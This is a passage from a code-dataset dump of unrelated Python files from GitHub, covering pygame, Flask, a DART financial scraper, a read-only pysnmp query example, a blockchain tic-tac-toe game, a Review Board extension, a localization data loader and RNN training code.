id for id in ids]\n ys = [anno_file_to_yolo_y(af, self.grid) for af in anno_files]\n xs = [image.img_to_array(image.load_img(image_file,target_size = self.target_size)) for image_file in image_files]\n self.steps += 1\n yield np.array(xs, dtype=np.float16), np.array(ys, dtype=np.float16)","repo_name":"huan9huan/ai-learn","sub_path":"yolo/yolo_data_generator.py","file_name":"yolo_data_generator.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24058697221","text":"import pygame\nimport sys\nimport time\nimport pygame.camera\n\n# Define some colors.\nBLACK = pygame.Color('black')\nWHITE = pygame.Color('red')\n\n\n# This is a simple class that will help us print to the screen.\n# It has nothing to do with the joysticks, just outputting the\n# information.\nclass TextPrint(object):\n def __init__(self):\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def tprint(self, screen, textString):\n textBitmap = self.font.render(textString, True, WHITE)\n screen.blit(textBitmap, (self.x, self.y))\n self.y += self.line_height\n\n def reset(self):\n self.x = 10\n self.y = 10\n self.line_height = 15\n\n def indent(self):\n self.x += 10\n\n def unindent(self):\n self.x -= 10\n\n\npygame.init() #initializes pygame\n# Set the width and height of the screen (width, height).\nWINDOW_HEIGHT = 700\nWINDOW_WIDTH = 500\nscreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates.\nclock = pygame.time.Clock()\n\n# Initialize the joysticks.\npygame.joystick.init()\n\n# Get ready to print.\ntextPrint = TextPrint()\n\n\n\n\n\n\nwhile not done:\n\n # EVENT PROCESSING STEP\n\n # Possible joystick actions: JOYAXISMOTION, JOYBALLMOTION, JOYBUTTONDOWN,\n # JOYBUTTONUP, JOYHATMOTION\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n print(\"closing\")\n done = True # Flag that we are done so we exit this loop.\n elif event.type == pygame.JOYBUTTONDOWN:\n print(\"Joystick button pressed.\")\n elif event.type == pygame.JOYBUTTONUP:\n print(\"Joystick button released.\")\n\n #\n # DRAWING STEP\n #\n # First, clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n #$screen.fill(BLACK)\n textPrint.reset()\n\n # Get count of joysticks.\n joystick_count = pygame.joystick.get_count()\n\n textPrint.tprint(screen, \"Number of joysticks: {}\".format(joystick_count))\n textPrint.indent()\n\n # For each joystick:\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n try:\n jid = joystick.get_instance_id()\n except AttributeError:\n # get_instance_id() is an SDL2 method\n jid = joystick.get_id()\n textPrint.tprint(screen, \"Joystick {}\".format(jid))\n textPrint.indent()\n\n # Get the name from the OS for the controller/joystick.\n name = joystick.get_name()\n textPrint.tprint(screen, \"Joystick name: {}\".format(name))\n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n textPrint.tprint(screen, \"GUID: {}\".format(guid))\n\n # Usually axis run in pairs, up/down for one, and left/right for\n # the other.\n\n\n buttons = joystick.get_numbuttons()\n for i in range(buttons):\n button = joystick.get_button(i)\n if(button == True and i == 6):\n done = True\n if(button == True and i == 3):\n print(\"camera swap\")\n\n #\n # ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT\n #\n\n # Go ahead and update the screen with what we've drawn.\n pygame.camera.init()\n camlist = pygame.camera.list_cameras()\n if camlist:\n cam = pygame.camera.Camera(camlist[0], (640,480))\n else:\n cam = pygame.camera.Camera('/dev/video0')\n\n cam.start()\n cam.get_image()\n\n\n\n image = cam.get_image()\n screen.blit(image, (0,0))\n pygame.display.update()\n pygame.display.flip()\n\n # Limit to 20 frames per second.\n clock.tick(20)\n\n# Close the window and quit.\n# If you forget this line, the program will 'hang'\n# on exit if running from IDLE.\npygame.quit()\n","repo_name":"winstondo/RoV_ThrusterControlSystem","sub_path":"Deprecated/pygameCamera.py","file_name":"pygameCamera.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"11177161477","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n'''\n---------------------------------\n\n``elm.sample_util.transform``\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'''\nimport copy\nimport logging\n\nfrom earthio import ElmStore\nimport numpy as np\nimport xarray as xr\n\nfrom elm.sample_util.step_mixin import StepMixin\n\nlogger = logging.getLogger(__name__)\n\n__all__ = ['Transform',]\n\n\n\nclass Transform(StepMixin):\n '''Wraps transform models like IncrementalPCA for use in elm.pipeline.Pipeline'''\n def __init__(self, estimator, partial_fit_batches=None):\n '''Wraps transform models like IncrementalPCA for use in elm.pipeline.Pipeline\n\n Parameters:\n :estimator: such as sklearn.decomposition.IncrementalPCA, a model with fit and transform methods\n :partial_fit_batches: how many times to call partial_fit each time Pipeline is evaluated\n\n '''\n\n self._estimator = estimator\n self._partial_fit_batches = partial_fit_batches\n self._params = estimator.get_params()\n\n def set_params(self, **params):\n filtered = {k: v for k, v in params.items()\n if k != 'partial_fit_batches'}\n self._estimator.set_params(**filtered)\n self._params.update(params)\n p = params.get('partial_fit_batches')\n if p:\n self._partial_fit_batches = p\n\n def get_params(self, **kwargs):\n params = self._estimator.get_params(**kwargs)\n params['partial_fit_batches'] = self._partial_fit_batches\n return params\n\n def _fit_trans(self, method, X, y=None, sample_weight=None, **kwargs):\n fitter_func = getattr(self._estimator, method)\n kw = dict(y=y, sample_weight=sample_weight, **kwargs)\n kw = {k: v for k, v in kw.items() if k in self._params}\n if isinstance(X, (ElmStore, xr.Dataset)):\n if hasattr(X, 'flat'):\n XX = X.flat.values\n space = X.flat.space\n else:\n raise ValueError(\"Call elm.pipeline.steps.Flatten() before Transform in pipeline or otherwise use X as an (earthio.ElmStore or xarray.Dataset)\")\n else:\n raise ValueError('Expected X to be an xarray.Dataset or earthio.ElmStore')\n out = fitter_func(X.flat.values, **kw)\n if 'transform' in method:\n # 'transform' or 'fit_transform' was called\n out = np.atleast_2d(out)\n band = ['transform_{}'.format(idx)\n for idx in range(out.shape[1])]\n coords = [('space', space),\n ('band', band)]\n attrs = copy.deepcopy(X.attrs)\n attrs.update(X.flat.attrs)\n attrs['band_order'] = band\n Xnew = ElmStore({'flat': xr.DataArray(out,\n coords=coords,\n dims=X.flat.dims,\n attrs=attrs)},\n attrs=attrs)\n return (Xnew, y, sample_weight)\n return out # a fitted \"self\"\n\n def partial_fit_batches(self, X, y=None, sample_weight=None, **kwargs):\n for _ in range(self._partial_fit_batches):\n logger.debug('Transform partial fit batch {} of {}'.format(_ + 1, self._partial_fit_batches))\n self.partial_fit(X, y=y, sample_weight=sample_weight, **kwargs)\n return self\n\n def partial_fit(self, X, y=None, sample_weight=None, **kwargs):\n if not hasattr(self._estimator, 'partial_fit'):\n raise ValueError('Cannot give partial_fit_batches to {} (does not have \"partial_fit\" method)'.format(self._estimator))\n return self._fit_trans('partial_fit', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def fit(self, X, y=None, sample_weight=None, **kwargs):\n if self._partial_fit_batches:\n return self.partial_fit_batches(X, y=y, sample_weight=sample_weight, **kwargs)\n return self._fit_trans('fit', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def transform(self, X, y=None, sample_weight=None, **kwargs):\n return self._fit_trans('transform', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def fit_transform(self, X, y=None, sample_weight=None, **kwargs):\n if not hasattr(self._estimator, 'transform'):\n return self._fit_trans('fit_transform', X, y=y, sample_weight=sample_weight, **kwargs)\n fitted = self.fit(X, y=y, sample_weight=sample_weight, **kwargs)\n return self.transform(X, y=y, sample_weight=sample_weight, **kwargs)\n","repo_name":"HKCaesar/elm","sub_path":"elm/sample_util/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"402466","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 2 00:05:44 2021\r\n\r\n@author: dms10\r\n\"\"\"\r\n\r\ndef hello():\r\n print(\"Hello Python!\")\r\n \r\nhello()\r\nhello()\r\nhello()\r\n\r\ndef hello2(name):\r\n print(\"Hello\", name)\r\n \r\nhello2(\"Justin\")\r\nhello2(\"John\")\r\nhello2(\"Mike\")","repo_name":"egyptai/Python","sub_path":"hello20210602.py","file_name":"hello20210602.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34860026261","text":"from flask import *\nimport random\nimport os\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef home():\n lines = open('facts.txt').read().splitlines()\n randomLine =random.choice(lines)\n return render_template(\"home.html\", fact=randomLine)\n\nif __name__ == \"__main__\":\n app.run(debug=False,host='0.0.0.0')\n","repo_name":"sjwoodr/blackhawks-facts","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39523778915","text":"########################################\n# Analysys Stock #\n########################################\nimport os, sys\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup as bs\nimport my\nimport get_company_code as getcode\n\nURL_MAIN = 'http://dart.fss.or.kr'\nURL_AUTH = '/api/search.xml?auth='\nAPI_KEY = my.DART['api_key']\nprint(API_KEY)\nURL_CRP = '&crp_cd='\ndef getCompayCode(name):\n c_code = str(COMPONY_CODES[name])\n while len(c_code) != 6:\n c_code = '0' + c_code\n print(c_code)\n return (c_code)\n\nCOMPONY_CODE = getCompayCode('유한양행')\nURL_DT = '&start_dt=19990101'\nBSN_TP = '&bsn_tp=A001&bsn_tp=A002&bsn_tp=A003'\n\n\nURL = URL_MAIN + URL_AUTH + API_KEY + URL_CRP + str(COMPONY_CODE) + URL_DT + BSN_TP\nRESPONSE = requests.get(URL).text\nSOUP = bs(RESPONSE, 'html.parser')\n\n\n## Define Empty DataFrame\nDATA = pd.DataFrame()\n\nRESULTS = SOUP.select('list')\n\nfor result in RESULTS:\n temp = pd.DataFrame(([[result.crp_cls.string, result.crp_nm.string,\\\n result.crp_cd.string, result.rpt_nm.string, result.rcp_no.string,\\\n result.flr_nm.string, result.rcp_dt.string, result.rmk.string]]),\\\n columns=['crp_cls', 'crp_nm', 'crp_cd','rpt_nm', 'rcp_no', 'flr_nm',\\\n 'rcp_dt', 'rmk'])\n DATA = pd.concat([DATA, temp])\nDATA = DATA.reset_index(drop=True)\n\nURL2 = URL_MAIN + '/dsaf001/main.do?rcpNo=' + DATA['rcp_no'][0]\nprint(URL2)\nRESPONSE2 = requests.get(URL2).text\nSOUP2 = bs(RESPONSE2, 'html.parser')\nRESULTS2 = str(SOUP2.find('head'))\nif len(RESULTS2.split(' 연결재무제표\",')) > 1:\n RESULTS2 = RESULTS2.split(' 연결재무제표\",')[1]\nelse:\n RESULTS2 = RESULTS2.split(' 재무제표\",')[1]\nRESULTS2 = RESULTS2.split('cnt++')[0]\nRESULTS2 = RESULTS2.split('viewDoc(')[1]\nRESULTS2 = RESULTS2.split(')')[0]\nRESULTS2 = RESULTS2.split(', ')\nRESULTS2 = [RESULTS2[i][1:-1]for i in range(len(RESULTS2))]\nURL3 = '/report/viewer.do?rcpNo='\nURL_FINAL = URL_MAIN + URL3 + RESULTS2[0] + '&dcmNo=' + RESULTS2[1] + '&eleId=' + RESULTS2[2]\\\n + '&offset=' + RESULTS2[3] + '&length=' + RESULTS2[4]\\\n + '&dtd=dart3.xsd'\n\nprint(URL_FINAL)\n\nRESPONSE3 = requests.get(URL_FINAL).text\nSOUP3 = bs(RESPONSE3, 'html.parser')\nRESULTS3 = SOUP3.select('table')\n## print(RESULTS3)\n","repo_name":"khjoony/deact","sub_path":"stock/packages/dart_api.py","file_name":"dart_api.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37769941954","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\n\n\nSNMP_HOST = '182.16.190.78'\nSNMP_PORT = 161\nSNMP_COMMUNITY = 'public'\n\n\nsnmpCmdGen = cmdgen.CommandGenerator()\n\nsnmpTransportData = cmdgen.UdpTransportTarget((SNMP_HOST,SNMP_PORT))\n\n\nerror,errorStatus,errorIndex,binds = snmpCmdGen.getCmd(cmdgen.CommunityData(SNMP_COMMUNITY),snmpTransportData,\"1.3.6.1.2.1.1.1.0\",\"1.3.6.1.2.1.1.3.0\",\"1.3.6.1.2.1.2.1.0\")\nif error:\n\tprint(\"Error\"+error)\nelse:\n\tif errorStatus:\n\t\tprint('%s at %s' %(errorStatus.prettyPrint(),errorIndex and binds[int(errorIndex)-1] or '?'))\n\telse:\n\t\tfor name,val in binds:\n\t\t\tprint('%s = %s' % (name.prettyPrint(),val.prettyPrint()))\n","repo_name":"PacktPublishing/Mastering-Python-for-Networking-and-Security","sub_path":"chapter7/code/pysnmp/snmp_example3.py","file_name":"snmp_example3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"61"} +{"seq_id":"17695405258","text":"import pygame.font\n\n\nclass Button:\n \"\"\"A class to create a button to control the game start\"\"\"\n\n def __init__(self, ai_settings, screen):\n \"\"\" Iniatilize button to start the game\"\"\"\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.ai_settings = ai_settings\n self.width = 250\n self.height = 60\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 42)\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n def draw_button(self, msg):\n \"\"\"Draw the start button in the screen\"\"\"\n button_image = self.font.render(msg, True, self.text_color, self.button_color)\n button_rect = button_image.get_rect()\n button_rect.center = self.rect.center\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(button_image, button_rect)\n","repo_name":"luiscaballerodiaz/Alien_Invasion_Implementation_in_Python","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11427420243","text":"import discord\nfrom discord.ext import commands\n\n\nclass Testing(commands.Cog):\n def __init__(self, test):\n self.bot = test\n\n @commands.command()\n async def react(self, ctx):\n emoji='\\N{Thumbs up sign}'\n await ctx.message.add_reaction(emoji)\n\ndef setup(client):\n client.add_cog(Testing(client))","repo_name":"Shreyasrana18/Amaterasu-test-bot","sub_path":"cogs/react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70599080196","text":"import json\nimport requests\n\n#RPC\nRPC_USER = 'your_rpc_username'\nRPC_PASSWORD = 'your_rpc_password'\nRPC_URL = 'http://127.0.0.1:15419/'\n\n#RPCCALL\ndef rpc_call(method, params=None):\n payload = {\n 'method': method,\n 'jsonrpc': '2.0',\n 'id': 1,\n }\n\n if params is not None:\n payload['params'] = params\n\n response = requests.post(RPC_URL, json=payload, auth=(RPC_USER, RPC_PASSWORD))\n\n if response.status_code != 200:\n raise Exception(f\"RPC call failed with status code {response.status_code}: {response.text}\")\n\n result = response.json().get('result')\n if result is None:\n raise Exception(f\"RPC call failed: {response.json().get('error')}\")\n\n return result\n\n#GAMEID\ndef create_new_game():\n game_id = 'NEOXA'\n initial_board = [[' ']*3 for _ in range(3)]\n return game_id, initial_board\n\n#MAKEMOVES\ndef make_move(board, player, row, col):\n if board[row][col] == ' ':\n board[row][col] = player\n return True\n return False\n\n#WINNERS\ndef check_winner(board, player):\n #Check for a win\n for i in range(3):\n if all(board[i][j] == player for j in range(3)) or all(board[j][i] == player for j in range(3)):\n return True\n if all(board[i][i] == player for i in range(3)) or all(board[i][2-i] == player for i in range(3)):\n return True\n return False\n\n#BOARD->METADATA\ndef board_to_metadata(board):\n flat_board = [cell for row in board for cell in row]\n metadata = ''.join(flat_board)\n return metadata\n\ndef submit_game_result(game_id, board, winner):\n metadata = board_to_metadata(board)\n hex_payload = metadata.encode().hex()\n\n # UTXO->TX\n unspent_outputs = rpc_call('listunspent')\n inputs = [{'txid': utxo['txid'], 'vout': utxo['vout']} for utxo in unspent_outputs]\n\n # Create the outputs object with the OP_RETURN data and an address for the transaction fee\n outputs = {\n 'data': hex_payload, # OP_RETURN data\n 'GLXZRqjavBKAkjoQgDsKNnPAvdDBpTyEb4': 10 \n # Transaction fee amount in coins\n # Current Change works as e.g. balance used in address\n # as a whole \"\"utxo 100 , tx fee 10 , tx fee = 90 , change = 10\n #refactoring needed for this in reverse \n }\n\n # Create\n raw_tx = rpc_call('createrawtransaction', [inputs, outputs])\n\n # Sign\n signed_tx = rpc_call('signrawtransaction', [raw_tx])\n\n # Send\n txid = rpc_call('sendrawtransaction', [signed_tx['hex']])\n\n return txid\n\n\n# Main game loop\ndef main():\n game_id, board = create_new_game()\n player = 'X'\n winner = None\n\n while True:\n # Display the board\n for row in board:\n print(' '.join(row))\n print()\n\n # Get player's move\n row, col = map(int, input(f\"Player {player}, enter row (0-2) and column (0-2) (e.g., '0 0'): \").split())\n\n # Make the move\n if make_move(board, player, row, col):\n # Check if there is a winner\n if check_winner(board, player):\n winner = player\n break\n\n # Switch to the other player\n player = 'X' if player == 'O' else 'O'\n\n # Display the final board\n for row in board:\n print(' '.join(row))\n print()\n\n # Submit the game result to the blockchain\n txid = submit_game_result(game_id, board, winner)\n print(f\"Game ID: {game_id}\")\n print(f\"Winner: {winner}\")\n print(f\"Transaction ID: {txid}\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"MuraMach/Neoxa_Gaming_Research","sub_path":"MetableGaming/MetableTICTACTOE.py","file_name":"MetableTICTACTOE.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1165713157","text":"import pandas as pd\nimport math\nimport os\n\n\ndef normalize(x, xmin, xmax, a, b):\n numerator = x - xmin\n denominator = xmax - xmin\n multiplier = b - a\n ans = (numerator / denominator) * multiplier + a\n return ans\n\n\nsig_min = -104\nsig_max = 0\ntar_min = 0.25\ntar_max = 1.0\nno_sig = 100\n\n\ndef normalize_wifi(num):\n ans = 0\n num = float(num)\n if math.isclose(num, no_sig, rel_tol=1e-3):\n return 0\n else:\n ans = normalize(num, sig_min, sig_max, tar_min, tar_max)\n return ans\n\n\nlat_min = 4864745.7450159714\nlat_max = 4865017.3646842018\nlat_tarmin = 0\nlat_tarmax = 1\n\n\ndef normalize_lat(num):\n num = float(num)\n ans = normalize(num, lat_min, lat_max, lat_tarmin, lat_tarmax)\n return ans\n\n\nlong_min = -7695.9387549299299000\nlong_max = -7299.786516730871000\nlong_tarmin = 0\nlong_tarmax = 1\n\n\ndef normalize_long(num):\n num = float(num)\n ans = normalize(num, long_min, long_max, long_tarmin, long_tarmax)\n return ans\n\n\ndef load():\n absolute_path = os.path.dirname(__file__)\n df = pd.read_csv(f'{absolute_path}/TrainingData.csv')\n # load more examples:\n # df_val = pd.read_csv(f'{absolute_path}/ValidationData.csv')\n # df = pd.concat([df, df_val])\n df.drop(columns=[\"RELATIVEPOSITION\", \"USERID\", \"PHONEID\", \"TIMESTAMP\"], inplace=True)\n\n wifi_cells = df.columns[:519]\n # for i in wifi_cells:\n # df[i] = df[i].apply(normalize_wifi)\n # df[\"LATITUDE\"] = df[\"LATITUDE\"].apply(normalize_lat)\n # df[\"LONGITUDE\"] = df[\"LONGITUDE\"].apply(normalize_long)\n\n X = df[wifi_cells].to_numpy()\n # Y = df[[\"LATITUDE\", \"LONGITUDE\", \"BUILDINGID\", \"FLOOR\"]].to_numpy()\n Y = df[[\"LATITUDE\", \"LONGITUDE\"]].to_numpy() / 1000\n\n return X, Y\n","repo_name":"ItaiAlon/LMVE","sub_path":"datasets/indoor_localization/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15298833146","text":"# Reports extension for Review Board.\nimport datetime\n\n\nfrom django.conf import settings\nfrom django.conf.urls.defaults import patterns, include\nfrom django.db.models import Sum\nfrom reviewboard.extensions.base import Extension\nfrom reviewboard.extensions.hooks import DashboardHook, URLHook, TemplateHook\nfrom reviewboard.reviews.signals import review_published\nfrom rbstats.hooks import RBStatsTableEntryHook\nfrom rbstopwatch.models import ReviewingSession\nfrom rbstopwatch.resources import reviewing_session_resource\n\nclass RBStopwatchStatsTableEntry(RBStatsTableEntryHook):\n def description_for_user(self):\n return \"Reviewing Time\"\n\n def for_user(self, user):\n all_reviewing_seconds = user.review_request_reviewing_sessions.aggregate(Sum('working_seconds'))['working_seconds__sum'] or 0\n total_reviewing_time = datetime.timedelta(seconds=all_reviewing_seconds)\n return str(total_reviewing_time)\n\n\nclass RBStopwatchExtension(Extension):\n\n is_configurable = True\n resources = [reviewing_session_resource]\n\n def __init__(self):\n Extension.__init__(self)\n \n self.activity_monitor = TemplateHook(self, \"base-scripts-post\", \n \"rbstopwatch/activity_monitor.html\", [\n 'view_diff', \n 'view_diff_revision', \n 'view_screenshot',\n ]\n )\n \n self.mousewheel_lib = TemplateHook(self, \"base-scripts\",\n \"rbstopwatch/mousewheel_lib.html\", [\n 'view_diff',\n 'view_diff_revision',\n 'view_screenshot',\n ]\n )\n \n self.review_display = TemplateHook(self, \"review-summary-header-post\",\n \"rbstopwatch/review_summary_insert.html\")\n\n self.stats_hook = RBStopwatchStatsTableEntry(self)\n\n\ndef on_review_published(sender, **kwargs):\n # Let's see if we can find the right ReviewingSession for this\n # user and review\n user = kwargs.get('user')\n review = kwargs.get('review')\n review_request = review.review_request\n review_session = ReviewingSession.objects.get(user=user, \n review_request=review_request,review=None)\n \n review_session.review = review\n review_session.save()\n\nreview_published.connect(on_review_published)\n","repo_name":"mikeconley/RB-Toy-Extensions","sub_path":"rbstopwatch/rbstopwatch/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"28442824254","text":"import cut_according_to_frame\nimport sys\nimport glob, os\nimport extract_keyframes_from_combined_shots\n\ndef representsint(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n\nif __name__ == '__main__':\n command = 'h'\n if len(sys.argv) < 2:\n command = 'h'\n elif sys.argv[1] == '-c':\n command = 'c'\n elif sys.argv[1] == '-f':\n command = 'f'\n if command == 'h':\n print('\\n-c: cut videos according to shots info' +\n '\\n-f [int n]: extract n keyframes from each shots, default is 6\\n')\n else:\n src_dir = os.getcwd()\n os.chdir(src_dir+\"/movie\")\n for file in glob.glob(\"*.mp4\"):\n if command == 'c':\n cut_according_to_frame.cut_videos(src_dir,file[:-4])\n elif command == 'f':\n if len(sys.argv) == 3 and representsint(sys.argv[2]):\n extract_keyframes_from_combined_shots.get_frames(src_dir,file[:-4],int(sys.argv[2]))\n else:\n extract_keyframes_from_combined_shots.get_frames(src_dir, file[:-4], 6)\n","repo_name":"roystormstout/movie_cut_tools","sub_path":"cut_automated.py","file_name":"cut_automated.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23548439191","text":"import sys\n\ndef main():\n\tT = int(input())\n\n\tfor t in range(1, T+1):\n\t\ts,k = input().split()\n\t\tk = int(k)\n\t\tans = 0\n\t\ts = list(s)\n\n\t\tfor i in range(0, len(s)-k+1):\n\t\t\tif str(s[i]) == '-':\n\t\t\t\tans+=1\n\t\t\t\tfor j in range(i,i+k):\n\t\t\t\t\tif str(s[j]) == '+':\n\t\t\t\t\t\ts[j] = '-'\n\t\t\t\t\telse:\n\t\t\t\t\t\ts[j] = '+'\n\t\t\t# print(s)\n\n\t\tflag = 0\n\t\tfor i in s:\n\t\t\tif str(i) == '-':\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\n\t\tprint (\"Case #\" + str(t) + \": \", end=\"\")\n\t\tif flag:\n\t\t\tprint (\"IMPOSSIBLE\")\n\t\telse:\n\t\t\tprint (str(ans))\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/511.py","file_name":"511.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10790554547","text":"# AMAL Master DAC\n# Novembre 2023\n\n# Ben Kabongo\n# M2 MVA\n\nimport datetime\nimport torch\nimport torch.nn as nn\nimport torchmetrics\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\nfrom utils import RNN, device, SampleMetroDataset\n\n\ndef many_to_one_train(\n model, \n loss_fn, \n accuracy_fn, \n dataloader, \n optimizer, \n writer, \n epoch_id, \n verbose=True\n):\n model.train()\n train_loss = 0\n for X, y in dataloader:\n X, y = X.permute(1, 0, 2).to(device), y.to(device)\n batch = X.size(1)\n\n h_0 = torch.zeros(batch, model.hidden_dim)\n h_n = model(X, h_0)[-1, :, :]\n y_pred = model.decode(h_n)\n loss = loss_fn(y_pred, y)\n\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n train_loss += loss.item()\n accuracy_fn(y_pred.argmax(1), y)\n \n train_loss /= len(dataloader)\n accuracy = accuracy_fn.compute()\n accuracy_fn.reset()\n writer.add_scalar(\"Loss/train\", train_loss, epoch_id)\n writer.add_scalar(\"Accuracy/train\", accuracy, epoch_id)\n\n if verbose and epoch_id % 10 == 0:\n print(f\"Epoch {epoch_id} : \\n\\tTrain : acc = {(accuracy):>0.4f}%, loss = {train_loss:>8f}\")\n\n\ndef many_to_one_test(\n model, \n loss_fn, \n accuracy_fn, \n dataloader, \n writer, \n epoch_id, \n verbose=True\n):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.permute(1, 0, 2).to(device), y.to(device)\n batch = X.size(1)\n\n h_0 = torch.zeros(batch, model.hidden_dim)\n h_n = model(X, h_0)[-1, :, :]\n y_pred = model.decode(h_n)\n\n test_loss += loss_fn(y_pred, y).item()\n accuracy_fn(y_pred.argmax(1), y)\n \n test_loss /= len(dataloader)\n accuracy = accuracy_fn.compute()\n accuracy_fn.reset()\n writer.add_scalar(\"Loss/test\", test_loss, epoch_id)\n writer.add_scalar(\"Accuracy/test\", accuracy, epoch_id)\n\n if verbose and epoch_id % 10 == 0:\n print(f\"\\tTest : acc = {(accuracy):>0.4f}%, loss: {test_loss:>8f}\")\n\nBASE_PATH = \"TPS/TP04/\"\nPATH = BASE_PATH + \"data/\"\n\nCLASSES = 2 # Nombre de stations utilisé\nLENGTH = 20 #Longueur des séquences \nDIM_INPUT = 2 # Dimension de l'entrée (1 (in) ou 2 (in/out))\nBATCH_SIZE = 32 #Taille du batch\n\nHIDDEN_DIM = 20\nLEARNING_RATE = 1e-2\nN_EPOCHS = 30\n\n\ndef sequence_classification(\n train_length=LENGTH, # longueuer des séquences en train\n test_length=LENGTH, # longueur des séquences en test\n input_dim=DIM_INPUT, # dimension de l'entrée\n hidden_dim=HIDDEN_DIM, # dimension latente du rnn\n n_classes=CLASSES, # nombre de classes\n batch_size=BATCH_SIZE, # taille du batch\n lr=LEARNING_RATE, # learning rate\n n_epochs=N_EPOCHS, # nombre d'époques\n hidden_activation=nn.Tanh(), # activation pour le calcul de l'état caché\n output_activation=nn.Sigmoid(), # activation pour l'output du rnn\n comment=\"\", # commentaire pour le writer\n verbose=True # verbose\n):\n\n matrix_train, matrix_test = torch.load(open(PATH+\"hzdataset.pch\",\"rb\"))\n ds_train = SampleMetroDataset(matrix_train[:, :, :n_classes, :input_dim], length=train_length)\n ds_test = SampleMetroDataset(matrix_test[:, :, :n_classes, :input_dim], length=test_length, stations_max=ds_train.stations_max)\n data_train = DataLoader(ds_train, batch_size=batch_size, shuffle=True)\n data_test = DataLoader(ds_test, batch_size=batch_size, shuffle=False)\n\n model = RNN(hidden_dim, input_dim, n_classes, hidden_activation, output_activation).to(device)\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=lr)\n\n accuracy_train = torchmetrics.classification.Accuracy(\n task=\"multiclass\", num_classes=n_classes\n )\n accuracy_test = torchmetrics.classification.Accuracy(\n task=\"multiclass\", num_classes=n_classes\n )\n\n writer = SummaryWriter(BASE_PATH + \"runs/exo2/\" + datetime.datetime.now().strftime(\"%Y_%m_%d-%H_%M_%S\"), comment=comment)\n for epoch_id in tqdm(range(n_epochs), \"Training\"):\n many_to_one_train(model, loss_fn, accuracy_train, data_train, optimizer, writer, epoch_id, verbose=verbose)\n many_to_one_test(model, loss_fn, accuracy_test, data_test, writer, epoch_id, verbose=verbose)\n\n return model\n\n\nif __name__ == \"__main__\":\n \n _ = sequence_classification(\n train_length=LENGTH, \n test_length=LENGTH, \n input_dim=DIM_INPUT, \n hidden_dim=HIDDEN_DIM,\n n_classes=CLASSES,\n batch_size=BATCH_SIZE,\n lr=LEARNING_RATE,\n n_epochs=N_EPOCHS,\n hidden_activation=nn.Tanh(),\n output_activation=nn.Sigmoid(),\n comment=\"\",\n verbose=False\n )\n\n TEST_LENGTH = 30\n print(f\"Test length = {TEST_LENGTH}\")\n _ = sequence_classification(\n train_length=LENGTH, 